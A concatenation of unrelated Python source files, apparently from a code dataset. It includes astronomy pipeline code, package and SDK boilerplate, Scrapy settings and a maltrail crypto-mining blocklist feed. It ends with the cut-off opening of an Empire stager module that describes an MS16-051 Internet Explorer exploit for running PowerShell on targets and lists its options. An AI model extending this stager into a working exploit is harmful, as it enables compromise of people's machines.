WLOG(params, 'info', TextEntry('40-503-00010'))
# get files
gfout = _get_files(params, recipe, path, rpath)
nightnames, filelist, basenames, mod_times, mkwargs = gfout
# construct a table
mastertable = Table()
mastertable[night_col] = nightnames
mastertable[itable_filecol] = basenames
mastertable[absfile_col] = filelist
mastertable[modified_col] = mod_times
for kwarg in mkwargs:
mastertable[kwarg] = mkwargs[kwarg]
# sort by sortcol
sortmask = np.argsort(mastertable[sortcol])
mastertable = mastertable[sortmask]
# save master table
mpath = os.path.join(params['DRS_DATA_RUN'], raw_index_file)
mastertable.write(mpath, overwrite=True)
# return the file list
return mastertable, rpath
def fix_header(params, recipe, infile=None, header=None,
raise_exception=False, **kwargs):
"""
Instrument specific header fixes are define in pseudo_const.py for an
instrument and called here (function in pseudo_const.py is HEADER_FIXES)
:param params:
:param infile:
:return:
"""
# deal with no header
if header is None:
header = infile.header
hdict = infile.hdict
filename = infile.filename
has_infile = True
else:
has_infile = False
hdict = Header()
filename = None
# load pseudo constants
pconst = constants.pload(params['INSTRUMENT'])
# use pseudo constant to apply any header fixes required (specific to
# a specific instrument) and update the header
try:
header, hdict = pconst.HEADER_FIXES(params=params, recipe=recipe,
header=header, hdict=hdict,
filename=filename,
**kwargs)
except lang.drs_exceptions.DrsHeaderError as e:
if raise_exception:
raise e
else:
eargs = [e.key, e.filename]
WLOG(params, 'error', TextEntry('01-001-00027', args=eargs))
# if the input was an infile return the infile back
if has_infile:
# return the updated infile
infile.header = header
infile.hdict = hdict
return infile
# else return the header (assuming input was a header only)
else:
# else return the header
return header, hdict
# =============================================================================
# Define other functions
# =============================================================================
def combine(params, recipe, infiles, math='average', same_type=True):
"""
Takes a list of infiles and combines them (infiles must be DrsFitsFiles)
combines using the math given.
Allowed math:
'sum', 'add', '+'
'average', 'mean'
'subtract', '-'
'divide', '/'
'multiply', 'times', '*'
Note 'infiles' must be all the same DrsFitsFile type to combine by default,
use 'same_type=False' to override this option
Note the header is copied from infiles[0]
:param params: ParamDict, parameter dictionary of constants
:param infiles: list of DrsFiles, list of DrsFitsFiles to combine
:param math: str, the math allowed (see above)
:param same_type: bool, if True all infiles must have the same DrsFitsFile
dtype
:type params: ParamDict
:type infiles: list[DrsFitsFile]
:type math: str
:type same_type: bool
:return: Returns the combined DrsFitsFile (header same as infiles[0])
:rtype: DrsFitsFile
"""
func_name = __NAME__ + '.combine()'
# if we have a string assume we have 1 file and skip combine
if type(infiles) is str:
return infiles
# make sure infiles is a list
if type(infiles) is not list:
WLOG(params, 'error', TextEntry('00-001-00020', args=[func_name]))
# if we have only one file (or none) skip combine
if len(infiles) == 1:
return infiles[0]
elif len(infiles) == 0:
return infiles
# check that all infiles are the same DrsFileType
if same_type:
for it, infile in enumerate(infiles):
if infile.name != infiles[0].name:
eargs = [infiles[0].name, it, infile.name, func_name]
WLOG(params, 'error', TextEntry('00-001-00021', args=eargs))
# get output path from params
outpath = str(params['OUTPATH'])
# check if outpath is set
if outpath is None:
WLOG(params, 'error', TextEntry('01-001-00023', args=[func_name]))
return None
# get the absolute path (for combined output)
if params['NIGHTNAME'] is None:
outdirectory = ''
else:
outdirectory = params['NIGHTNAME']
# combine outpath and out directory
abspath = os.path.join(outpath, outdirectory)
# make new infile using math
outfile = infiles[0].combine(infiles[1:], math, same_type, path=abspath)
# update the number of files
outfile.numfiles = len(infiles)
# write to disk
WLOG(params, '', TextEntry('40-001-00025', args=[outfile.filename]))
outfile.write_file()
# add to output files (for indexing)
recipe.add_output_file(outfile)
# return combined infile
return outfile
def get_mid_obs_time(params, header, out_fmt=None, **kwargs):
func_name = __NAME__ + '.get_mid_obs_time()'
# get obs_time
outkey = params['KW_MID_OBS_TIME'][0]
# get format from params
timefmt = params.instances['KW_MID_OBS_TIME'].datatype
# get data type from params
timetype = params.instances['KW_MID_OBS_TIME'].dataformat
# get raw value from header
rawtime = header[outkey]
# get time object
obstime = Time(timetype(rawtime), format=timefmt)
# set the method for getting mid obs time
method = 'header'
dbname = 'header_time'
# return time in requested format
if out_fmt is None:
return obstime, method
elif out_fmt == 'mjd':
return float(obstime.mjd), method
elif out_fmt == 'jd':
return float(obstime.jd), method
elif out_fmt == 'iso' or out_fmt == 'human':
return obstime.iso, method
elif out_fmt == 'unix':
return float(obstime.unix), method
elif out_fmt == 'decimalyear':
return float(obstime.decimalyear), method
else:
kinds = ['None', 'human', 'iso', 'unix', 'mjd', 'jd', 'decimalyear']
eargs = [dbname, ' or '.join(kinds), out_fmt, func_name]
WLOG(params, 'error', TextEntry('00-001-00030', args=eargs))
# =============================================================================
# Worker functions
# =============================================================================
def deal_with_bad_header(p, hdu, filename):
"""
Deal with bad headers by iterating through good hdu's until we hit a
problem
:param p: ParamDict, the constants file
:param hdu: astropy.io.fits HDU
:param filename: string - the filename for logging
:return data:
:return header:
"""
# define condition to pass
cond = True
# define iterator
it = 0
# define storage
datastore = []
headerstore = []
# loop through HDU's until we cannot open them
while cond:
# noinspection PyBroadException
try:
datastore.append(hdu[it].data)
headerstore.append(hdu[it].header)
except Exception as _:
cond = False
# iterate
it += 1
# print message
if len(datastore) > 0:
dargs = [it - 1, filename]
WLOG(p, 'warning', TextEntry('10-001-00001', args=dargs))
# find the first one that contains equal shaped array
valid = []
for d_it in range(len(datastore)):
if hasattr(datastore[d_it], 'shape'):
valid.append(d_it)
# if valid is empty we have a problem
if len(valid) == 0:
WLOG(p, 'error', TextEntry('01-001-00001', args=[filename]))
# return valid data
return datastore, headerstore
def check_dtype_for_header(value):
# if value is a string, check whether it is a path; if so, strip the path
# and keep only the base file name
if isinstance(value, str):
if os.path.isfile(value):
newvalue = os.path.basename(value)
elif os.path.isdir(value):
newvalue = os.path.dirname(value)
else:
newvalue = str(value)
# if value is a bool then we need to convert it to an int (1 or 0)
elif isinstance(value, bool):
if value:
newvalue = 1
else:
newvalue = 0
# if value is a float need to check for NaN
elif isinstance(value, float):
if np.isnan(value):
newvalue = 'NaN'
else:
newvalue = float(value)
# if value is a int do nothing
elif isinstance(value, int):
newvalue = int(value)
# else convert to string to be safe
else:
newvalue = str(value)
# return new value
return newvalue
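# --- Illustrative examples (added; not part of the original module) ---
# check_dtype_for_header maps python values onto FITS-header-safe ones.
def _example_check_dtype_for_header():
    examples = [True, False, float('nan'), 3.5, 7, dict(a=1)]
    # expected: [1, 0, 'NaN', 3.5, 7, "{'a': 1}"]
    return [check_dtype_for_header(value) for value in examples]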
def _get_path_and_check(params, key):
# check key in params
if key not in params:
WLOG(params, 'error', '{0} not found in params'.format(key))
# get top level path to search
rpath = params[key]
# deal with not having nightname
if 'NIGHTNAME' not in params:
path = str(rpath)
elif params['NIGHTNAME'] not in ['', 'None', None]:
path = os.path.join(rpath, params['NIGHTNAME'])
else:
path = str(rpath)
# check if path exists
if not os.path.exists(path):
WLOG(params, 'error', 'Path {0} does not exist'.format(path))
else:
return path, rpath
def _get_files(params, recipe, path, rpath, **kwargs):
func_name = __NAME__ + '.get_files()'
# get properties from params
absfile_col = pcheck(params, 'REPROCESS_ABSFILECOL', 'absfile_col', kwargs,
func_name)
modified_col = pcheck(params, 'REPROCESS_MODIFIEDCOL', 'modified_col',
kwargs, func_name)
raw_index_file = pcheck(params, 'REPROCESS_RAWINDEXFILE', 'raw_index_file',
kwargs, func_name)
# get the file filter (should be None unless we want specific files)
filefilter = params.get('FILENAME', None)
if filefilter is not None:
filefilter = list(params['FILENAME'])
# ----------------------------------------------------------------------
# get the pseudo constant object
pconst = constants.pload(params['INSTRUMENT'])
# ----------------------------------------------------------------------
# get header keys
headerkeys = pconst.OUTPUT_FILE_HEADER_KEYS()
# get raw valid files
raw_valid = pconst.VALID_RAW_FILES()
# ----------------------------------------------------------------------
# storage list
filelist, basenames, nightnames, mod_times = [], [], [], []
blist = []
# load raw index
rawindexfile = os.path.join(params['DRS_DATA_RUN'], raw_index_file)
if os.path.exists(rawindexfile):
rawindex = drs_table.read_table(params, rawindexfile, fmt='fits')
else:
rawindex = None
# ----------------------------------------------------------------------
# populate the storage dictionary
kwargs = dict()
for key in headerkeys:
kwargs[key] = []
# ----------------------------------------------------------------------
# deal with white/black list for nights
wnightnames = None
if 'WNIGHTNAMES' in params:
if not drs_text.null_text(params['WNIGHTNAMES'], ['None', 'All', '']):
wnightnames = params.listp('WNIGHTNAMES', dtype=str)
bnightnames = None
if 'BNIGHTNAMES' in params:
if not drs_text.null_text(params['BNIGHTNAMES'], ['None', 'All', '']):
bnightnames = params.listp('BNIGHTNAMES', dtype=str)
# ----------------------------------------------------------------------
# get files (walk through path)
for root, dirs, files in os.walk(path, followlinks=True):
# loop around files in this root directory
for filename in files:
# --------------------------------------------------------------
if filefilter is not None:
if os.path.basename(filename) not in filefilter:
continue
# --------------------------------------------------------------
# get night name
ucpath = drs_path.get_uncommon_path(rpath, root)
if ucpath is None:
eargs = [path, rpath, func_name]
WLOG(params, 'error', TextEntry('00-503-00003', args=eargs))
# --------------------------------------------------------------
# make sure file is valid
isvalid = False
for suffix in raw_valid:
if filename.endswith(suffix):
isvalid = True
# --------------------------------------------------------------
# do not scan empty ucpath
if len(ucpath) == 0:
continue
# --------------------------------------------------------------
# deal with blacklist/whitelist
if not drs_text.null_text(bnightnames, ['None', 'All', '']):
if ucpath in bnightnames:
# only print path if not already in blist
if ucpath not in blist:
# log blacklisted
margs = [ucpath]
WLOG(params, '', TextEntry('40-503-00031', args=margs))
# add to blist for printouts
blist.append(ucpath)
# skip this night
continue
if not drs_text.null_text(wnightnames, ['None', 'All', '']):
if ucpath not in wnightnames:
# skip this night
continue
# elif we haven't seen this night before log statement
elif ucpath not in nightnames:
# log: whitelisted
margs = [ucpath]
WLOG(params, '', TextEntry('40-503-00030', args=margs))
# --------------------------------------------------------------
# log the night directory
if (ucpath not in nightnames) and (ucpath != rpath):
# log: scanning directory
margs = [ucpath]
WLOG(params, '', TextEntry('40-503-00003', args=margs))
# --------------------------------------------------------------
# get absolute path
abspath = os.path.join(root, filename)
modified = os.path.getmtime(abspath)
# --------------------------------------------------------------
# if not valid skip
if not isvalid:
continue
# --------------------------------------------------------------
# else append to list
else:
nightnames.append(ucpath)
filelist.append(abspath)
basenames.append(filename)
mod_times.append(modified)
# --------------------------------------------------------------
# see if file in raw index and has correct modified date
if rawindex is not None:
# find file
rowmask = (rawindex[absfile_col] == abspath)
# find match date
rowmask &= modified == rawindex[modified_col]
# only continue if both conditions found
if np.sum(rowmask) > 0:
# locate file
row = np.where(rowmask)[0][0]
# if both conditions met load from raw fits file
for key in headerkeys:
kwargs[key].append(rawindex[key][row])
# file was found
rfound = True
else:
rfound = False
else:
rfound = False
# --------------------------------------------------------------
# deal with header
if filename.endswith('.fits') and not rfound:
# read the header
header = read_header(params, abspath)
# fix the headers
try:
header, _ = fix_header(params, recipe, header=header,
raise_exception=True)
except lang.drs_exceptions.DrsHeaderError as e:
# log warning message
eargs = [e.key, abspath]
emsg = TextEntry('10-001-00008', args=eargs)
WLOG(params, 'warning', emsg)
# remove from lists
nightnames.pop()
filelist.pop()
basenames.pop()
mod_times.pop()
# continue to next file
continue
# loop around header keys
for key in headerkeys:
rkey = params[key][0]
if rkey in header:
kwargs[key].append(header[rkey])
else:
kwargs[key].append('')
# ----------------------------------------------------------------------
# sort by filename
sortmask = np.argsort(filelist)
filelist = np.array(filelist)[sortmask]
nightnames = np.array(nightnames)[sortmask]
basenames = np.array(basenames)[sortmask]
mod_times = np.array(mod_times)[sortmask]
# need to sort kwargs
for key in kwargs:
kwargs[key] = np.array(kwargs[key])[sortmask]
# ----------------------------------------------------------------------
# return filelist
return nightnames, filelist, basenames, mod_times, kwargs
# =============================================================================
# Start of code
# =============================================================================
# Main code here
if __name__ == "__main__":
# ----------------------------------------------------------------------
# print 'Hello World!'
print("Hello World!")
# =============================================================================
# End of code
# =============================================================================
| 39.057063 | 80 | 0.501488 |
5ead94b33f93390f8069c8f48a75a9bd6f91e800 | 653 | py | Python | safegraph_patterns/setup.py | jingjtang/covidcast-indicators | 34cb8786f78fbea2710b810a9500ee02c2379241 | ["MIT"] | 8 | 2020-10-12T04:27:04.000Z | 2022-03-08T16:56:57.000Z | safegraph_patterns/setup.py | jingjtang/covidcast-indicators | 34cb8786f78fbea2710b810a9500ee02c2379241 | ["MIT"] | 666 | 2020-09-30T21:18:41.000Z | 2022-03-31T22:37:12.000Z | safegraph_patterns/setup.py | jingjtang/covidcast-indicators | 34cb8786f78fbea2710b810a9500ee02c2379241 | ["MIT"] | 13 | 2020-10-01T14:25:06.000Z | 2022-02-12T08:31:19.000Z |
from setuptools import setup
from setuptools import find_packages
required = [
"numpy",
"pandas",
"pydocstyle",
"pytest",
"pytest-cov",
"pylint==2.8.3",
"delphi-utils"
]
setup(
name="delphi_safegraph_patterns",
version="0.0.1",
description="Mobility Indicators from Safegraph",
author="",
author_email="",
url="https://github.com/cmu-delphi/covidcast-indicators",
install_requires=required,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Programming Language :: Python :: 3.8",
],
packages=find_packages(),
)
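# --- Illustrative usage note (added; not part of the original file) ---
# From the package directory this setup script is typically consumed as:
#   pip install .        # installs delphi_safegraph_patterns plus `required` deps
#   python -m pytest     # pytest/pytest-cov are declared in `required` above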
| 22.517241 | 61 | 0.633997 |
b1f56d45f082bad798a71fb82ae7323ba9c190d5 | 3,361 | py | Python | alipay/aop/api/domain/MybankPaymentTradeBusinessOrderRefundModel.py | antopen/alipay-sdk-python-all | 8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c | ["Apache-2.0"] | 213 | 2018-08-27T16:49:32.000Z | 2021-12-29T04:34:12.000Z | alipay/aop/api/domain/MybankPaymentTradeBusinessOrderRefundModel.py | antopen/alipay-sdk-python-all | 8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c | ["Apache-2.0"] | 29 | 2018-09-29T06:43:00.000Z | 2021-09-02T03:27:32.000Z | alipay/aop/api/domain/MybankPaymentTradeBusinessOrderRefundModel.py | antopen/alipay-sdk-python-all | 8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c | ["Apache-2.0"] | 59 | 2018-08-27T16:59:26.000Z | 2022-03-25T10:08:15.000Z |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class MybankPaymentTradeBusinessOrderRefundModel(object):
def __init__(self):
self._amount = None
self._currency_value = None
self._order_no = None
self._refund_type = None
self._remark = None
self._request_no = None
@property
def amount(self):
return self._amount
@amount.setter
def amount(self, value):
self._amount = value
@property
def currency_value(self):
return self._currency_value
@currency_value.setter
def currency_value(self, value):
self._currency_value = value
@property
def order_no(self):
return self._order_no
@order_no.setter
def order_no(self, value):
self._order_no = value
@property
def refund_type(self):
return self._refund_type
@refund_type.setter
def refund_type(self, value):
self._refund_type = value
@property
def remark(self):
return self._remark
@remark.setter
def remark(self, value):
self._remark = value
@property
def request_no(self):
return self._request_no
@request_no.setter
def request_no(self, value):
self._request_no = value
def to_alipay_dict(self):
params = dict()
if self.amount:
if hasattr(self.amount, 'to_alipay_dict'):
params['amount'] = self.amount.to_alipay_dict()
else:
params['amount'] = self.amount
if self.currency_value:
if hasattr(self.currency_value, 'to_alipay_dict'):
params['currency_value'] = self.currency_value.to_alipay_dict()
else:
params['currency_value'] = self.currency_value
if self.order_no:
if hasattr(self.order_no, 'to_alipay_dict'):
params['order_no'] = self.order_no.to_alipay_dict()
else:
params['order_no'] = self.order_no
if self.refund_type:
if hasattr(self.refund_type, 'to_alipay_dict'):
params['refund_type'] = self.refund_type.to_alipay_dict()
else:
params['refund_type'] = self.refund_type
if self.remark:
if hasattr(self.remark, 'to_alipay_dict'):
params['remark'] = self.remark.to_alipay_dict()
else:
params['remark'] = self.remark
if self.request_no:
if hasattr(self.request_no, 'to_alipay_dict'):
params['request_no'] = self.request_no.to_alipay_dict()
else:
params['request_no'] = self.request_no
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = MybankPaymentTradeBusinessOrderRefundModel()
if 'amount' in d:
o.amount = d['amount']
if 'currency_value' in d:
o.currency_value = d['currency_value']
if 'order_no' in d:
o.order_no = d['order_no']
if 'refund_type' in d:
o.refund_type = d['refund_type']
if 'remark' in d:
o.remark = d['remark']
if 'request_no' in d:
o.request_no = d['request_no']
return o
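# --- Illustrative round-trip sketch (added; not part of the original module) ---
# The generated model converts to and from plain dicts for the Alipay API payload;
# the field values below are hypothetical.
def _example_refund_model_roundtrip():
    model = MybankPaymentTradeBusinessOrderRefundModel()
    model.amount = '10.00'
    model.currency_value = 'CNY'
    model.order_no = '20210122123456'   # hypothetical order number
    model.request_no = 'refund-0001'    # hypothetical idempotent request id
    payload = model.to_alipay_dict()
    restored = MybankPaymentTradeBusinessOrderRefundModel.from_alipay_dict(payload)
    return payload, restored.order_no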
| 28.974138 | 79 | 0.582862 |
c825b56c321bc8bd7e630b81e7c10f965b7616af | 3,675 | py | Python | localshop/apps/packages/utils.py | CheeseTheMonkey/localshop | d597eb07b20e20e2c4f9f5416b131c48638f0ab3 | ["BSD-3-Clause"] | null | null | null | localshop/apps/packages/utils.py | CheeseTheMonkey/localshop | d597eb07b20e20e2c4f9f5416b131c48638f0ab3 | ["BSD-3-Clause"] | null | null | null | localshop/apps/packages/utils.py | CheeseTheMonkey/localshop | d597eb07b20e20e2c4f9f5416b131c48638f0ab3 | ["BSD-3-Clause"] | null | null | null |
import inspect
import hashlib
import logging
import os
from django.core.files.uploadedfile import TemporaryUploadedFile
from django.db.models import FieldDoesNotExist
from django.db.models.fields.files import FileField
from django.http import QueryDict
from django.utils.datastructures import MultiValueDict
logger = logging.getLogger(__name__)
def parse_distutils_request(request):
"""Parse the `request.raw_post_data` and update the request POST and FILES
attributes.
"""
try:
sep = request.raw_post_data.splitlines()[1]
except:
raise ValueError('Invalid post data')
request.POST = QueryDict('', mutable=True)
try:
request._files = MultiValueDict()
except Exception:
pass
for part in filter(lambda e: e.strip(), request.raw_post_data.split(sep)):
try:
header, content = part.lstrip().split('\n', 1)
except Exception:
continue
if content.startswith('\n'):
content = content[1:]
if content.endswith('\n'):
content = content[:-1]
headers = parse_header(header)
if "name" not in headers:
continue
if "filename" in headers and headers['name'] == 'content':
dist = TemporaryUploadedFile(name=headers["filename"],
size=len(content),
content_type="application/gzip",
charset='utf-8')
dist.write(content)
dist.seek(0)
request.FILES.appendlist('distribution', dist)
else:
# Distutils sends UNKNOWN for empty fields (e.g platform)
# [russell.sim@gmail.com]
if content == 'UNKNOWN':
content = None
request.POST.appendlist(headers["name"], content)
def parse_header(header):
headers = {}
for kvpair in filter(lambda p: p,
map(lambda p: p.strip(),
header.split(';'))):
try:
key, value = kvpair.split("=", 1)
except ValueError:
continue
headers[key.strip()] = value.strip('"')
return headers
def delete_files(sender, **kwargs):
"""Signal callback for deleting old files when database item is deleted"""
for fieldname in sender._meta.get_all_field_names():
try:
field = sender._meta.get_field(fieldname)
except FieldDoesNotExist:
continue
if isinstance(field, FileField):
instance = kwargs['instance']
fieldfile = getattr(instance, fieldname)
if not hasattr(fieldfile, 'path'):
return
if not os.path.exists(fieldfile.path):
return
# Check if there are other instances which reference this file
is_referenced = (
instance.__class__._default_manager
.filter(**{'%s__exact' % fieldname: fieldfile})
.exclude(pk=instance._get_pk_val())
.exists())
if is_referenced:
return
try:
field.storage.delete(fieldfile.path)
except Exception:
logger.exception(
'Error when trying to delete file %s of package %s:' % (
instance.pk, fieldfile.path))
def md5_hash_file(fh):
"""Return the md5 hash of the given file-object"""
md5 = hashlib.md5()
while True:
data = fh.read(8192)
if not data:
break
md5.update(data)
return md5.hexdigest()
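# --- Illustrative usage sketch (added; not part of the original module) ---
# md5_hash_file accepts any file-like object opened in binary mode.
def _example_md5_hash_file(path='/tmp/example.tar.gz'):  # hypothetical path
    with open(path, 'rb') as fh:
        return md5_hash_file(fh)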
| 29.878049 | 78 | 0.562993 |
7da649e07b984bd0448d2270ee2738e20e1b732a | 3,229 | py | Python | disney_fandom_crawler/settings.py | fiqrisr/disney_fandom_crawler | 0151904a2ea0c3c3f7a3d14cf8aa05b9e512e4b1 | ["Apache-2.0"] | 2 | 2021-04-16T06:31:55.000Z | 2021-04-19T14:14:33.000Z | disney_fandom_crawler/settings.py | fiqrisr/disney_fandom_crawler | 0151904a2ea0c3c3f7a3d14cf8aa05b9e512e4b1 | ["Apache-2.0"] | null | null | null | disney_fandom_crawler/settings.py | fiqrisr/disney_fandom_crawler | 0151904a2ea0c3c3f7a3d14cf8aa05b9e512e4b1 | ["Apache-2.0"] | null | null | null |
# Scrapy settings for disney_fandom_crawler project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://docs.scrapy.org/en/latest/topics/settings.html
# https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = "disney_fandom_crawler"
SPIDER_MODULES = ["disney_fandom_crawler.spiders"]
NEWSPIDER_MODULE = "disney_fandom_crawler.spiders"
# Crawl responsibly by identifying yourself (and your website) on the user-agent
# USER_AGENT = 'disney_fandom_crawler (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
# CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
# DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
# CONCURRENT_REQUESTS_PER_DOMAIN = 16
# CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
# COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
# TELNETCONSOLE_ENABLED = False
# Override the default request headers:
# DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
# }
# Enable or disable spider middlewares
# See https://docs.scrapy.org/en/latest/topics/spider-middleware.html
# SPIDER_MIDDLEWARES = {
# 'disney_fandom_crawler.middlewares.DisneyFandomCrawlerSpiderMiddleware': 543,
# }
# Enable or disable downloader middlewares
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
# DOWNLOADER_MIDDLEWARES = {
# 'disney_fandom_crawler.middlewares.DisneyFandomCrawlerDownloaderMiddleware': 543,
# }
# Enable or disable extensions
# See https://docs.scrapy.org/en/latest/topics/extensions.html
# EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
# }
# Configure item pipelines
# See https://docs.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
"disney_fandom_crawler.pipelines.JsonWriterPipeline": 300,
}
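# The JsonWriterPipeline enabled above lives in disney_fandom_crawler/pipelines.py,
# which is not shown here. The sketch below is only an illustration of what a
# minimal JSON-lines writer pipeline usually looks like in Scrapy (it assumes the
# itemadapter package that recent Scrapy releases depend on); it is not the
# project's actual implementation.
import json
from itemadapter import ItemAdapter
class ExampleJsonWriterPipeline:
    """Illustrative only: write each scraped item as one JSON line."""
    def open_spider(self, spider):
        self.file = open("items.jl", "w", encoding="utf-8")
    def close_spider(self, spider):
        self.file.close()
    def process_item(self, item, spider):
        self.file.write(json.dumps(ItemAdapter(item).asdict()) + "\n")
        return item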
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/autothrottle.html
# AUTOTHROTTLE_ENABLED = True
# The initial download delay
# AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
# AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
# AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
# AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
# HTTPCACHE_ENABLED = True
# HTTPCACHE_EXPIRATION_SECS = 0
# HTTPCACHE_DIR = 'httpcache'
# HTTPCACHE_IGNORE_HTTP_CODES = []
# HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| 36.280899
| 103
| 0.781356
|
8f940dfd60e03191455d85830217b782194cb8db
| 689
|
py
|
Python
|
trails/feeds/minerchk.py
|
Jahismighty/maltrail
|
9bc70430993b2140ceb4dbac4b487251a9254416
|
[
"MIT"
] | 1
|
2021-01-10T14:35:36.000Z
|
2021-01-10T14:35:36.000Z
|
trails/feeds/minerchk.py
|
Jahismighty/maltrail
|
9bc70430993b2140ceb4dbac4b487251a9254416
|
[
"MIT"
] | 29
|
2018-10-18T20:14:49.000Z
|
2019-07-08T07:45:08.000Z
|
trails/feeds/minerchk.py
|
Jahismighty/maltrail
|
9bc70430993b2140ceb4dbac4b487251a9254416
|
[
"MIT"
] | 2
|
2018-11-29T22:50:57.000Z
|
2019-04-12T03:35:35.000Z
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2018 Miroslav Stampar (@stamparm)
See the file 'LICENSE' for copying permission
"""
from core.common import retrieve_content
__url__ = "https://raw.githubusercontent.com/Hestat/minerchk/master/hostslist.txt"
__check__ = ".com"
__info__ = "crypto mining (suspicious)"
__reference__ = "github.com/Hestat"
def fetch():
retval = {}
content = retrieve_content(__url__)
if __check__ in content:
for line in content.split('\n'):
line = line.strip()
if not line or line.startswith('#') or '.' not in line:
continue
retval[line] = (__info__, __reference__)
return retval
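# A small usage sketch (illustrative only): fetch() downloads the hosts list via
# retrieve_content() and returns a dict mapping each trail to (info, reference).
if __name__ == "__main__":
    for trail, (info, reference) in fetch().items():
        print(trail, info, reference)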
| 25.518519
| 82
| 0.656023
|
c99afd2d722bb350182afa532409dc6d715f4626
| 208
|
py
|
Python
|
mmdet/core/bbox/iou_calculators/builder.py
|
deepakksingh/mmdetection
|
b0d845f1fecf8064db30ef6b456b6ef5f36fa40f
|
[
"Apache-2.0"
] | 232
|
2021-05-25T12:55:24.000Z
|
2022-03-25T07:58:49.000Z
|
mmdet/core/bbox/iou_calculators/builder.py
|
deepakksingh/mmdetection
|
b0d845f1fecf8064db30ef6b456b6ef5f36fa40f
|
[
"Apache-2.0"
] | 51
|
2021-05-29T06:36:54.000Z
|
2022-03-27T09:24:39.000Z
|
mmdet/core/bbox/iou_calculators/builder.py
|
deepakksingh/mmdetection
|
b0d845f1fecf8064db30ef6b456b6ef5f36fa40f
|
[
"Apache-2.0"
] | 66
|
2021-06-01T03:40:08.000Z
|
2022-03-30T16:51:21.000Z
|
from mmcv.utils import Registry, build_from_cfg
IOU_CALCULATORS = Registry('IoU calculator')
def build_iou_calculator(cfg, default_args=None):
return build_from_cfg(cfg, IOU_CALCULATORS, default_args)
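# A hedged usage sketch: this assumes mmdet is installed and that its default 2D
# IoU calculator (registered elsewhere in the package as 'BboxOverlaps2D') is
# available in IOU_CALCULATORS.
if __name__ == '__main__':
    import torch
    iou_calculator = build_iou_calculator(dict(type='BboxOverlaps2D'))
    bboxes1 = torch.tensor([[0., 0., 10., 10.]])
    bboxes2 = torch.tensor([[5., 5., 15., 15.]])
    print(iou_calculator(bboxes1, bboxes2))  # 1x1 matrix of pairwise IoU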
| 26
| 61
| 0.8125
|
7762887e1385534892167c2a4c274949017e2e72
| 8,197
|
py
|
Python
|
empire/server/stagers/windows/ms16-051.py
|
gr33nm0nk2802/Empire
|
886e5131d51b082325f57dc0a5c8eeb39fb04fe1
|
[
"BSD-3-Clause"
] | 1
|
2021-08-03T21:34:06.000Z
|
2021-08-03T21:34:06.000Z
|
empire/server/stagers/windows/ms16-051.py
|
gr33nm0nk2802/Empire
|
886e5131d51b082325f57dc0a5c8eeb39fb04fe1
|
[
"BSD-3-Clause"
] | null | null | null |
empire/server/stagers/windows/ms16-051.py
|
gr33nm0nk2802/Empire
|
886e5131d51b082325f57dc0a5c8eeb39fb04fe1
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import print_function
from empire.server.common import helpers
class Stager(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'MS16-051 IE RCE',
'Author': ['CrossGroupSecurity'],
'Description': (
'Leverages MS16-051 to execute powershell in unpatched browsers. This is a file-less vector which '
'works on IE9/10/11 and all versions of Windows. Target will have to open link with vulnerable version '
'of IE.'),
'Comments': [
'https://github.com/CrossGroupSecurity/PowerShell-MS16-051-IE-RCE'
]
}
# any options needed by the stager, settable during runtime
self.options = {
'Listener': {
'Description': 'Listener to generate stager for.',
'Required': True,
'Value': ''
},
'Language': {
'Description': 'Language of the stager to generate.',
'Required': True,
'Value': 'powershell'
},
'StagerRetries': {
'Description': 'Times for the stager to retry connecting.',
'Required': False,
'Value': '0'
},
'Base64': {
'Description': 'Switch. Base64 encode the output.',
'Required': True,
'Value': 'True',
'SuggestedValues': ['True', 'False'],
'Strict': True
},
'Obfuscate': {
'Description': 'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for '
'obfuscation types. For powershell only.',
'Required': False,
'Value': 'False',
'SuggestedValues': ['True', 'False'],
'Strict': True
},
'ObfuscateCommand': {
'Description': 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For '
'powershell only.',
'Required': False,
'Value': r'Token\All\1,Launcher\STDIN++\12467'
},
'OutFile': {
'Description': 'Filename that should be used for the generated output, otherwise returned as a string.',
'Required': False,
'Value': 'index.html'
},
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'ProxyCreds': {
'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, '
'or other).',
'Required': False,
'Value': 'default'
}
